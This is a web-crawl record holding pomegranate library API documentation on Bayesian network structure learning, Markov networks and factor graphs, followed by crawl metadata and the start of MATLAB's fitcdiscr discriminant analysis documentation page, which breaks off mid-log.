graph.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_exact_component()\n\nFind the optimal graph over a multi-node component of the constaint graph.\n\nThe general algorithm in this case is to begin with each variable and add all possible single children for that entry recursively until completion. This will result in a far sparser order graph than before. In addition, one can eliminate entries from the parent graphs that contain invalid parents as they are a fast of computational time.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_exact_dp()\n\nFind the optimal graph over a set of variables with no other knowledge.\n\nThis is the naive dynamic programming structure learning task where the optimal graph is identified from a set of variables using an order graph and parent graphs. This can be used either when no constraint graph is provided or for a SCC which is made up of a node containing a self-loop. This is a reference implementation that uses the naive shortest path algorithm over the entire order graph. The ‘exact’ option uses the A* path in order to avoid considering the full order graph.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_exact_slap()\n\nFind the optimal graph in a node with a Self Loop And Parents (SLAP).\n\nInstead of just performing exact BNSL over the set of all parents and removing the offending edges there are efficiencies that can be gained by considering the structure. In particular, parents not coming from the main node do not need to be considered in the order graph but simply added to each entry after creation of the order graph. This is because those variables occur earlier in the topological ordering but it doesn’t matter how they occur otherwise. Parent graphs must be defined over all variables however.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_exact_with_constraints()\n\nThis returns the optimal Bayesian network given a set of constraints.\n\nThis function controls the process of learning the Bayesian network by taking in a constraint graph, identifying the strongly connected components (SCCs) and solving each one using the appropriate algorithm. This is mostly an internal function.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. constraint_graph : networkx.DiGraph A directed graph showing valid parent sets for each variable. Each node is a set of variables, and edges represent which variables can be valid parents of those variables. The naive structure learning task is just all variables in a single node with a self edge, meaning that you know nothing about n_jobs : int The number of threads to use when learning the structure of the network. This parallelized both the creation of the parent graphs for each variable and the solving of the SCCs. -1 means use all available resources. Default is 1, meaning no parallelism. structure : tuple, shape=(d,) The parents for each variable in the network.\npomegranate.BayesianNetwork.discrete_exact_with_constraints_task()\n\nThis is a wrapper for the function to be parallelized by joblib.\n\nThis function takes in a single task as an id and a set of parents and children and calls the appropriate function. This is mostly a wrapper for joblib to parallelize.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. task : tuple A 3-tuple containing the id, the set of parents and the set of children to learn a component of the Bayesian network over. The cases represent a SCC of the following: 0 - Self loop and no parents 1 - Self loop and parents 2 - Parents and no self loop 3 - Multiple nodes n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs for each task or the finding of best parents in case 2. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.discrete_greedy()\n\nFind the optimal graph over a set of variables with no other knowledge.\n\nThis is the naive dynamic programming structure learning task where the optimal graph is identified from a set of variables using an order graph and parent graphs. This can be used either when no constraint graph is provided or for a SCC which is made up of a node containing a self-loop. It uses DP/A* in order to find the optimal graph without considering all possible topological sorts. A greedy version of the algorithm can be used that massively reduces both the computational and memory cost while frequently producing the optimal graph.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. greedy : bool, default is True Whether the use a heuristic in order to massive reduce computation and memory time, but without the guarantee of finding the best network. n_jobs : int The number of threads to use when learning the structure of the network. This parallelizes the creation of the parent graphs. structure : tuple, shape=(d,) The parents for each variable in this SCC\npomegranate.BayesianNetwork.generate_parent_graph()\n\nGenerate a parent graph for a single variable over its parents.\n\nThis will generate the parent graph for a single parents given the data. A parent graph is the dynamically generated best parent set and respective score for each combination of parent variables. For example, if we are generating a parent graph for x1 over x2, x3, and x4, we may calculate that having x2 as a parent is better than x2,x3 and so store the value of x2 in the node for x2,x3.\n\nParameters: X : numpy.ndarray, shape=(n, d) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : numpy.ndarray, shape=(n,) The weight of each sample as a positive double. Default is None. key_count : numpy.ndarray, shape=(d,) The number of unique keys in each column. pseudocount : double A pseudocount to add to each possibility. max_parents : int The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. parent_set : tuple, default () The variables which are possible parents for this variable. If nothing is passed in then it defaults to all other variables, as one would expect in the naive case. This allows for cases where we want to build a parent graph over only a subset of the variables. structure : tuple, shape=(d,) The parents for each variable in this SCC\n\n## Markov Networks¶\n\nMarkov networks (sometimes called Markov random fields) are probabilistic models that are typically represented using an undirected graph. Each of the nodes in the graph represents a variable in the data and each of the edges represent an associate. Unlike Bayesian networks which have directed edges and clear directions of causality, Markov networks have undirected edges and only encode associations.\n\nCurrently, pomegranate only supports discrete Markov networks, meaning that the values must be categories, i.e. ‘apples’ and ‘oranges’, or 1 and 2, where 1 and 2 refer to categories, not numbers, and so 2 is not explicitly ‘bigger’ than 1.\n\n### Initialization¶\n\nMarkov networks can be initialized in two ways, depending on whether the underlying graphical structure is known or not: (1) a list of the joint probabilities tables can be passed into the initialization, with one table per clique in the graph, or (2) both the graphical structure and distributions can be learned directly from data. This mirrors the other models that are implemented in pomegranate. However, because finding the optimal Markov network requires enumerating a number of potential graphs that is exponential with the number of dimensions in the data, it can be fairly time intensive to find the exact network.\n\nLet’s see an example of creating a Markov network with three cliques in it.\n\nfrom pomegranate import *\n\nd1 = JointProbabilityTable([\n[0, 0, 0.1],\n[0, 1, 0.2],\n[1, 0, 0.4],\n[1, 1, 0.3]], [0, 1])\n\nd2 = JointProbabilityTable([\n[0, 0, 0, 0.05],\n[0, 0, 1, 0.15],\n[0, 1, 0, 0.07],\n[0, 1, 1, 0.03],\n[1, 0, 0, 0.12],\n[1, 0, 1, 0.18],\n[1, 1, 0, 0.10],\n[1, 1, 1, 0.30]], [1, 2, 3])\n\nd3 = JointProbabilityTable([\n[0, 0, 0, 0.08],\n[0, 0, 1, 0.12],\n[0, 1, 0, 0.11],\n[0, 1, 1, 0.19],\n[1, 0, 0, 0.04],\n[1, 0, 1, 0.06],\n[1, 1, 0, 0.23],\n[1, 1, 1, 0.17]], [2, 3, 4])\n\nmodel = MarkovNetwork([d1, d2, d3])\nmodel.bake()\n\n\nThat was fairly simple. Each JointProbabilityTable object just had to include the table of all values that the variables can take as well as a list of variable indexes that are included in the table, in the order from left to right that they appear. For example, in d1, the first column of the table corresponds to the first column of data in a data matrix and the second column in the table corresponds to the second column in a data matrix.\n\nOne can also initialize a Markov network based completely on data. Currently, the only algorithm that pomegranate supports for this is the Chow-Liu tree-building algorithm. This algorithm first calculates the mutual information between all pairs of variables and then determines the maximum spanning tree through it. This process generally captures the strongest dependencies in the data set. However, because it requires all variables to have at least one connection, it can lead to instances where variables are incorrectly associated with each other. Overall, it generally performs well and it fairly fast to calculate.\n\nfrom pomegranate import *\nimport numpy\n\nX = numpy.random.randint(2, size=(100, 6))\nmodel = MarkovNetwork.from_samples(X)\n\n\n### Probability¶\n\nThe probability of an example under a Markov network is more difficult to calculate than under a Bayesian network. With a Bayesian network, one can simply multiply the probabilities of each variable given its parents to get a probability of the entire example. However, repeating this process for a Markov network (by plugging in the values of each clique and multiplying across all cliques) results in a value called the “unnormalized” probability. This value is called “unnormalized” because the sum of this value across all combinations of values that the variables in an example can take does not sum to 1.\n\nThe normalization of an “unnormalized” probability requires the calculation of a partition function. This function (frequently abbreviated Z) is just the sum of the probability of all combinations of values that the variables can take. After calculation, one can just divide the unnormalized probability by this value to get the normalized probability. The only problem is that the calculation of the partition function requires the summation over a number of examples that grows exponentially with the number of dimensions. You can read more about this in the tutorial.\n\nIf you have a small number of variables (<30) it shouldn’t be a problem to calculate the partition function and then normalized probabilities.\n\n>>> print(model.probability([1, 0, 1, 0, 1]))\n-4.429966143312331\n\n\n### Prediction¶\n\nMarkov networks can be used to predict the value of missing variables given the observed values in a process called “inference.” In other predictive models there are typically a single or fixed set of missing values that need to be predicted, commonly referred to as the labels. However, in the case of Markov (or Bayesian) networks, the missing values can be any variables and the inference process will use all of the available data to impute those missing values. For example:\n\n>>> print(model.predict([[None, 0, None, 1, None]]))\n[[1, 0, 0, 1, 1]]\n\n\n### API Reference¶\n\nclass pomegranate.MarkovNetwork.MarkovNetwork\n\nA Markov Network Model.\n\nA Markov network is an undirected graph where nodes represent variables, edges represent associations between the variables, and the lack of an edge represents a conditional independence.\n\nParameters: distributions : list, tuple, or numpy.ndarray A collection of joint probability distributions that represent the name : str, optional The name of the model. Default is None\nbake()\n\nFinalize the topology of the underlying factor graph model.\n\nAssign a numerical index to every clique and create the underlying factor graph model. This method must be called before any of the probability-calculating or inference methods because the probability calculating methods rely on the partition function and the inference methods rely on the factor graph.\n\nParameters: calculate_partition : bool, optional Whether to calculate the partition function. This is not necessary if the goal is simply to perform inference, but is required if the goal is to calculate the probability of examples under the model. None\nclear_summaries()\n\nClear the summary statistics stored in the object.\n\ncopy()\n\nReturn a deep copy of this distribution object.\n\nThis object will not be tied to any other distribution or connected in any form.\n\nParameters: None distribution : Distribution A copy of the distribution with the same parameters.\nfit()\n\nFit the model to data using MLE estimates.\n\nFit the model to the data by updating each of the components of the model, which are univariate or multivariate distributions. This uses a simple MLE estimate to update the distributions according to their summarize or fit methods.\n\nThis is a wrapper for the summarize and from_summaries methods.\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to train on, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. inertia : double, optional The inertia for updating the distributions, passed along to the distribution method. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Only effects hidden Markov models defined over discrete distributions. Default is 0. verbose : bool, optional Whether or not to print out improvement information over iterations. Only required if doing semisupervised learning. Default is False. calculate_partition : bool, optional Whether to calculate the partition function. This is not necessary if the goal is simply to perform inference, but is required if the goal is to calculate the probability of examples under the model. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. self : MarkovNetwork The fit Markov network object with updated model parameters.\nfreeze()\n\nFreeze the distribution, preventing updates from occurring.\n\nfrom_json()\n\nRead in a serialized Markov Network and return the appropriate object.\n\nParameters: s : str A JSON formatted string containing the file. model : object A properly initialized and baked model.\nfrom_samples()\n\nLearn the structure of the network from data.\n\nFind the structure of the network from data using a Markov structure learning score. This currently enumerates all the exponential number of structures and finds the best according to the score. This allows weights on the different samples as well. The score that is optimized is the minimum description length (MDL).\n\nIf not all states for a variable appear in the supplied data, this function can not gurantee that the returned Markov Network is optimal when ‘exact’ or ‘exact-dp’ is used. This is because the number of states for each node is derived only from the data provided, and the scoring function depends on the number of states of a variable.\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. algorithm : str, one of ‘chow-liu’, ‘greedy’, ‘exact’, ‘exact-dp’ optional The algorithm to use for learning the Bayesian network. Default is ‘greedy’ that greedily attempts to find the best structure, and frequently can identify the optimal structure. ‘exact’ uses DP/A* to find the optimal Bayesian network, and ‘exact-dp’ tries to find the shortest path on the entire order lattice, which is more memory and computationally expensive. ‘exact’ and ‘exact-dp’ should give identical results, with ‘exact-dp’ remaining an option mostly for debugging reasons. ‘chow-liu’ will return the optimal tree-like structure for the Bayesian network, which is a very fast approximation but not always the best network. max_parents : int, optional The maximum number of parents a node can have. If used, this means using the k-learn procedure. Can drastically speed up algorithms. If -1, no max on parents. Default is -1. root : int, optional For algorithms which require a single root (‘chow-liu’), this is the root for which all edges point away from. User may specify which column to use as the root. Default is the first column. constraint_graph : networkx.DiGraph or None, optional A directed graph showing valid parent sets for each variable. Each node is a set of variables, and edges represent which variables can be valid parents of those variables. The naive structure learning task is just all variables in a single node with a self edge, meaning that you know nothing about pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. name : str, optional The name of the model. Default is None. reduce_dataset : bool, optional Given the discrete nature of these datasets, frequently a user will pass in a dataset that has many identical samples. It is time consuming to go through these redundant samples and a far more efficient use of time to simply calculate a new dataset comprised of the subset of unique observed samples weighted by the number of times they occur in the dataset. This typically will speed up all algorithms, including when using a constraint graph. Default is True. n_jobs : int, optional The number of threads to use when learning the structure of the network. If a constraint graph is provided, this will parallelize the tasks as directed by the constraint graph. If one is not provided it will parallelize the building of the parent graphs. Both cases will provide large speed gains. model : MarkovNetwork The learned Markov Network.\nfrom_structure()\n\nReturn a Markov network from a predefined structure.\n\nPass in the structure of the network as a tuple of tuples and get a fit network in return. The tuple should contain n tuples, with one for each node in the graph. Each inner tuple should be of the parents for that node. For example, a three node graph where both node 0 and 1 have node 2 as a parent would be specified as ((2,), (2,), ()).\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to fit the structure too, where each row is a sample and each column corresponds to the associated variable. structure : tuple of tuples The parents for each node in the graph. If a node has no parents, then do not specify any parents. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. model : MarkovNetwork A Markov network with the specified structure.\nfrom_summaries()\n\nUse MLE on the stored sufficient statistics to train the model.\n\nParameters: inertia : double, optional The inertia for updating the distributions, passed along to the distribution method. Default is 0.0. pseudocount : double, optional A pseudocount to add to the emission of each distribution. This effectively smoothes the states to prevent 0. probability symbols if they don’t happen to occur in the data. Default is 0. calculate_partition : bool, optional Whether to calculate the partition function. This is not necessary if the goal is simply to perform inference, but is required if the goal is to calculate the probability of examples under the model. None\nfrom_yaml()\n\nDeserialize this object from its YAML representation.\n\nlog_probability()\n\nReturn the log probability of samples under the Markov network.\n\nThe log probability is just the sum of the log probabilities under each of the components minus the partition function. This method will return a vector of log probabilities, one for each sample.\n\nParameters: X : array-like, shape (n_samples, n_dim) The sample is a vector of points where each dimension represents the same variable as added to the graph originally. It doesn’t matter what the connections between these variables are, just that they are all ordered the same. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. unnormalized : bool, optional Whether to return the unnormalized or normalized probabilities. The normalized probabilities requires the partition function to be calculated. logp : numpy.ndarray or double The log probability of the samples if many, or the single log probability.\nmarginal()\n\nReturn the marginal probabilities of each variable in the graph.\n\nThis is equivalent to a pass of belief propagation on a graph where no data has been given. This will calculate the probability of each variable being in each possible emission when nothing is known.\n\nParameters: None marginals : array-like, shape (n_nodes) An array of univariate distribution objects showing the marginal probabilities of that variable.\npredict()\n\nPredict missing values of a data matrix using MLE.\n\nImpute the missing values of a data matrix using the maximally likely predictions according to the loopy belief propagation (also known as the forward-backward) algorithm. Run each example through the algorithm (predict_proba) and replace missing values with the maximally likely predicted emission.\n\nParameters: X : array-like, shape (n_samples, n_nodes) Data matrix to impute. Missing values must be either None (if lists) or np.nan (if numpy.ndarray). Will fill in these values with the maximally likely ones. max_iterations : int, optional Number of iterations to run loopy belief propagation for. Default is 100. n_jobs : int The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. y_hat : numpy.ndarray, shape (n_samples, n_nodes) This is the data matrix with the missing values imputed.\npredict_proba()\n\nReturns the probabilities of each variable in the graph given evidence.\n\nThis calculates the marginal probability distributions for each state given the evidence provided through loopy belief propagation. Loopy belief propagation is an approximate algorithm which is exact for certain graph structures.\n\nParameters: X : dict or array-like, shape <= n_nodes The evidence supplied to the graph. This can either be a dictionary with keys being state names and values being the observed values (either the emissions or a distribution over the emissions) or an array with the values being ordered according to the nodes incorporation in the graph and None for variables which are unknown. It can also be vectorized, so a list of dictionaries can be passed in where each dictionary is a single sample, or a list of lists where each list is a single sample, both formatted as mentioned before. The preferred method is as an numpy array. max_iterations : int, optional The number of iterations with which to do loopy belief propagation. Usually requires only 1. Default is 100. check_input : bool, optional Check to make sure that the observed symbol is a valid symbol for that distribution to produce. Default is True. n_jobs : int, optional The number of threads to use when parallelizing the job. This parameter is passed directly into joblib. Default is 1, indicating no parallelism. y_hat : array-like, shape (n_samples, n_nodes) An array of univariate distribution objects showing the probabilities of each variable.\nprobability()\n\nReturn the probability of samples under the Markov network.\n\nThis is just a wrapper that exponentiates the result from the log probability method.\n\nParameters: X : array-like, shape (n_samples, n_dim) The sample is a vector of points where each dimension represents the same variable as added to the graph originally. It doesn’t matter what the connections between these variables are, just that they are all ordered the same. n_jobs : int, optional The number of jobs to use to parallelize, either the number of threads or the number of processes to use. -1 means use all available resources. Default is 1. unnormalized : bool, optional Whether to return the unnormalized or normalized probabilities. The normalized probabilities requires the partition function to be calculated. prob : numpy.ndarray or double The log probability of the samples if many, or the single log probability.\nsample()\n\nReturn a random item sampled from this distribution.\n\nParameters: n : int or None, optional The number of samples to return. Default is None, which is to generate a single sample. sample : double or object Returns a sample from the distribution of a type in the support of the distribution.\nscore()\n\nReturn the accuracy of the model on a data set.\n\nParameters: X : numpy.ndarray, shape=(n, d) The values of the data set y : numpy.ndarray, shape=(n,) The labels of each value\nsummarize()\n\nSummarize a batch of data and store the sufficient statistics.\n\nThis will partition the dataset into columns which belong to their appropriate distribution. If the distribution has parents, then multiple columns are sent to the distribution. This relies mostly on the summarize function of the underlying distribution.\n\nParameters: X : array-like, shape (n_samples, n_nodes) The data to train on, where each row is a sample and each column corresponds to the associated variable. weights : array-like, shape (n_nodes), optional The weight of each sample as a positive double. Default is None. None\nthaw()\n\nThaw the distribution, re-allowing updates to occur.\n\nto_json()\n\nSerialize the model to a JSON.\n\nParameters: separators : tuple, optional The two separators to pass to the json.dumps function for formatting. indent : int, optional The indentation to use at each level. Passed to json.dumps for formatting. json : str A properly formatted JSON object.\nto_yaml()\n\nSerialize the model to YAML for compactness.\n\npomegranate.MarkovNetwork.discrete_chow_liu_tree()\n\nFind the Chow-Liu tree that spans a data set.\n\nThe Chow-Liu algorithm first calculates the mutual information between each pair of variables and then constructs a maximum spanning tree given that. This algorithm slightly from the one implemented for Bayesian networks because Bayesian networks are directed and need a node to be the root. In contrast, the structure here is undirected and so is a simple maximum spanning tree.\n\n## Factor Graphs¶\n\n### API Reference¶\n\nclass pomegranate.FactorGraph.FactorGraph\n\nA Factor Graph model.\n\nA bipartite graph where conditional probability tables are on one side, and marginals for each of the variables involved are on the other side.\n\nParameters: name : str, optional The name of the model. Default is None.\nbake()\n\nFinalize the topology of the model.\n\nAssign a numerical index to every state and create the underlying arrays corresponding to the states and edges between the states. This method must be called before any of the probability-calculating methods. This is the same as the HMM bake, except that at the end it sets current state information.\n\nParameters: None None\nfrom_json()\n\nRead in a serialized FactorGraph and return the appropriate instance.\n\nParameters: s: str A JSON formatted string containing the file. model: object A properly instantiated and baked model.\nmarginal()\n\nReturn the marginal probabilities of each variable in the graph.\n\nThis is equivalent to a pass of belief propagation on a graph where no data has been given. This will calculate the probability of each variable being in each possible emission when nothing is known.\n\nParameters: None marginals : array-like, shape (n_nodes) An array of univariate distribution objects showing the marginal probabilities of that variable.\nplot()\n\nDraw this model’s graph using NetworkX and matplotlib.\n\nNote that this relies on networkx’s built-in graphing capabilities (and not Graphviz) and thus can’t draw self-loops.\n\nSee networkx.draw_networkx() for the keywords you can pass in.\n\nParameters: **kwargs : any The arguments to pass into networkx.draw_networkx() None\npredict_proba()\n\nReturns the probabilities of each variable in the graph given evidence.\n\nThis calculates the marginal probability distributions for each state given the evidence provided through loopy belief propagation. Loopy belief propagation is an approximate algorithm which is exact for certain graph structures.\n\nParameters: data : dict or array-like, shape <= n_nodes, optional The evidence supplied to the graph. This can either be a dictionary with keys being state names and values being the observed values (either the emissions or a distribution over the emissions) or an array with the values being ordered according to the nodes incorporation in the graph (the order fed into .add_states/add_nodes) and None for variables which are unknown. If nothing is fed in then calculate the marginal of the graph. max_iterations : int, optional The number of iterations with which to do loopy belief propagation. Usually requires only 1. check_input : bool, optional Check to make sure that the observed symbol is a valid symbol for that distribution to produce. probabilities : array-like, shape (n_nodes) An array of univariate distribution objects showing the probabilities of each variable.\nto_json()\n\nSerialize the model to JSON\n\nParameters: separators: tuple, optional The two separators to pass to the json.dumps function for formatting. indent: int, optional The indentation to use at each level. Passed to json.dumps for formatting." ]
[ null, "https://readthedocs.org/projects/pomegranate/downloads/htmlzip/latest/_images/pomegranate-logo.png", null, "https://travis-ci.org/jmschrei/pomegranate.svg", null, "https://ci.appveyor.com/api/projects/status/github/jmschrei/pomegranate", null, "https://readthedocs.org/projects/pomegranate/badge/", null, "https://readthedocs.org/projects/pomegranate/downloads/htmlzip/latest/_images/pomegranate_comparison.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8398257,"math_prob":0.9404287,"size":219807,"snap":"2019-51-2020-05","text_gpt3_token_len":49273,"char_repetition_ratio":0.19703098,"word_repetition_ratio":0.48416638,"special_character_ratio":0.2236644,"punctuation_ratio":0.14145169,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.99215025,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,2,null,2,null,2,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-26T03:19:39Z\",\"WARC-Record-ID\":\"<urn:uuid:40753e4b-8b77-4f42-b1d0-7f93765f7644>\",\"Content-Length\":\"1049445\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d3eced75-06c9-41ae-bc8b-9e21bb5adda0>\",\"WARC-Concurrent-To\":\"<urn:uuid:e8863a1a-9686-4f04-a789-2048660a6265>\",\"WARC-IP-Address\":\"104.28.22.38\",\"WARC-Target-URI\":\"https://readthedocs.org/projects/pomegranate/downloads/htmlzip/latest/\",\"WARC-Payload-Digest\":\"sha1:UQEEZ7MKOLUDM4KHPHIRJKRY35QHZCVM\",\"WARC-Block-Digest\":\"sha1:VLYVSHMQK25STMGUXJ343DP4DQ35RI6T\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"application/zip\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251684146.65_warc_CC-MAIN-20200126013015-20200126043015-00301.warc.gz\"}"}
https://jp.mathworks.com/help/stats/fitcdiscr.html?lang=en
[ "Documentation\n\n# fitcdiscr\n\nFit discriminant analysis classifier\n\n## Syntax\n\n``Mdl = fitcdiscr(Tbl,ResponseVarName)``\n``Mdl = fitcdiscr(Tbl,formula)``\n``Mdl = fitcdiscr(Tbl,Y)``\n``Mdl = fitcdiscr(X,Y)``\n``Mdl = fitcdiscr(___,Name,Value)``\n\n## Description\n\n````Mdl = fitcdiscr(Tbl,ResponseVarName)` returns a fitted discriminant analysis model based on the input variables (also known as predictors, features, or attributes) contained in the table `Tbl` and output (response or labels) contained in `ResponseVarName`.```\n````Mdl = fitcdiscr(Tbl,formula)` returns a fitted discriminant analysis model based on the input variables contained in the table `Tbl`. `formula` is an explanatory model of the response and a subset of predictor variables in `Tbl` used to fit `Mdl`.```\n````Mdl = fitcdiscr(Tbl,Y)` returns a fitted discriminant analysis model based on the input variables contained in the table `Tbl` and response `Y`.```\n\nexample\n\n````Mdl = fitcdiscr(X,Y)` returns a discriminant analysis classifier based on the input variables `X` and response `Y`.```\n\nexample\n\n````Mdl = fitcdiscr(___,Name,Value)` fits a classifier with additional options specified by one or more name-value pair arguments, using any of the previous syntaxes. For example, you can optimize hyperparameters to minimize the model’s cross-validation loss, or specify the cost of misclassification, the prior probabilities for each class, or the observation weights.```\n\n## Examples\n\ncollapse all\n\n`load fisheriris`\n\nTrain a discriminant analysis model using the entire data set.\n\n`Mdl = fitcdiscr(meas,species)`\n```Mdl = ClassificationDiscriminant ResponseName: 'Y' CategoricalPredictors: [] ClassNames: {'setosa' 'versicolor' 'virginica'} ScoreTransform: 'none' NumObservations: 150 DiscrimType: 'linear' Mu: [3x4 double] Coeffs: [3x3 struct] Properties, Methods ```\n\n`Mdl` is a `ClassificationDiscriminant` model. To access its properties, use dot notation. For example, display the group means for each predictor.\n\n`Mdl.Mu`\n```ans = 3×4 5.0060 3.4280 1.4620 0.2460 5.9360 2.7700 4.2600 1.3260 6.5880 2.9740 5.5520 2.0260 ```\n\nTo predict labels for new observations, pass `Mdl` and predictor data to `predict`.\n\nThis example shows how to optimize hyperparameters automatically using `fitcdiscr`. The example uses Fisher's iris data.\n\n`load fisheriris`\n\nFind hyperparameters that minimize five-fold cross-validation loss by using automatic hyperparameter optimization.\n\nFor reproducibility, set the random seed and use the `'expected-improvement-plus'` acquisition function.\n\n```rng(1) Mdl = fitcdiscr(meas,species,'OptimizeHyperparameters','auto',... 'HyperparameterOptimizationOptions',... struct('AcquisitionFunctionName','expected-improvement-plus'))```", null, "", null, "```|=====================================================================================================| | Iter | Eval | Objective | Objective | BestSoFar | BestSoFar | Delta | Gamma | | | result | | runtime | (observed) | (estim.) | | | |=====================================================================================================| | 1 | Best | 0.66667 | 1.3141 | 0.66667 | 0.66667 | 13.261 | 0.25218 | | 2 | Best | 0.02 | 0.51226 | 0.02 | 0.064227 | 2.7404e-05 | 0.073264 | | 3 | Accept | 0.04 | 0.31609 | 0.02 | 0.020084 | 3.2455e-06 | 0.46974 | | 4 | Accept | 0.66667 | 0.39453 | 0.02 | 0.020118 | 14.879 | 0.98622 | | 5 | Accept | 0.046667 | 0.50662 | 0.02 | 0.019907 | 0.00031449 | 0.97362 | | 6 | Accept | 0.04 | 0.58647 | 0.02 | 0.028438 | 4.5092e-05 | 0.43616 | | 7 | Accept | 0.046667 | 0.34729 | 0.02 | 0.031424 | 2.0973e-05 | 0.9942 | | 8 | Accept | 0.02 | 0.21367 | 0.02 | 0.022424 | 1.0554e-06 | 0.0024286 | | 9 | Accept | 0.02 | 0.21008 | 0.02 | 0.021105 | 1.1232e-06 | 0.00014039 | | 10 | Accept | 0.02 | 0.21403 | 0.02 | 0.020948 | 0.00011837 | 0.0032994 | | 11 | Accept | 0.02 | 0.46597 | 0.02 | 0.020172 | 1.0292e-06 | 0.027725 | | 12 | Accept | 0.02 | 0.41797 | 0.02 | 0.020105 | 9.7792e-05 | 0.0022817 | | 13 | Accept | 0.02 | 0.37597 | 0.02 | 0.020038 | 0.00036014 | 0.0015136 | | 14 | Accept | 0.02 | 0.40659 | 0.02 | 0.019597 | 0.00021059 | 0.0044789 | | 15 | Accept | 0.02 | 0.21894 | 0.02 | 0.019461 | 1.1911e-05 | 0.0010135 | | 16 | Accept | 0.02 | 0.15173 | 0.02 | 0.01993 | 0.0017896 | 0.00071115 | | 17 | Accept | 0.02 | 0.16054 | 0.02 | 0.019551 | 0.00073745 | 0.0066899 | | 18 | 